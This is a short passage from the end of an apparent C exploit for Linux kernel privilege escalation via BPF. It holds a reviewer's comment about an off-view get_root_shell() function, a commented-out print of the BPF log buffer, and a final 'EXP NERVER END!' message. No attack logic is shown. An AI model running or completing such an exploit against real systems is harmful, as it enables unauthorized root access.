        // NOTE(review): get_root_shell() is defined outside this view; if it
        // never returns, the lines below are unreachable.
//      puts(bpf_log_buf);
        puts("EXP NERVER END!");
        return 0;
}